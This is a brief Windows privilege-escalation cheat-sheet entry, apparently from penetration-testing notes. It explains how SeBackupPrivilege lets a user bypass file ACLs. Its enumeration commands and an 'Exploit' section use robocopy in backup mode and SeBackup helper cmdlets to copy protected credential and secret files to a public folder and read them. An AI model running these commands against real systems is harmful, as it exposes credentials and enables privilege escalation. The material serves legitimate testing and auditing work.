Protected file copy uses backup semantics to copy files that normal ACL checks would block.
This is useful for credential files, application secrets, configuration files, and other protected data. It becomes privilege escalation only when the copied material exposes credentials or a path to privileged execution.
When enumerating protected file copy opportunities, try to identify:
SeBackupPrivilegein the current token- The exact protected file path
- A writable destination path
- Whether the file is locked
- Whether backup-aware copy tooling is available
Enumeration
Confirm the privilege:
whoami /priv
Check target file metadata:
dir /q "C:\Path\To\Protected\File.txt"
icacls "C:\Path\To\Protected\File.txt"
Interesting findings include:
- Normal copy fails with access denied
- Backup-aware copy succeeds
- File contains credentials, keys, or privileged configuration
Once the target is confirmed, copy through backup semantics instead of normal file APIs.
Exploit
Use Robocopy in backup mode:
robocopy /B "C:\Path\To\Protected" "C:\Users\Public" File.txt
Copy with a SeBackup-aware helper if required:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege "C:\Path\To\Protected\File.txt" "C:\Users\Public\File.txt"
Review the copied file:
type C:\Users\Public\File.txt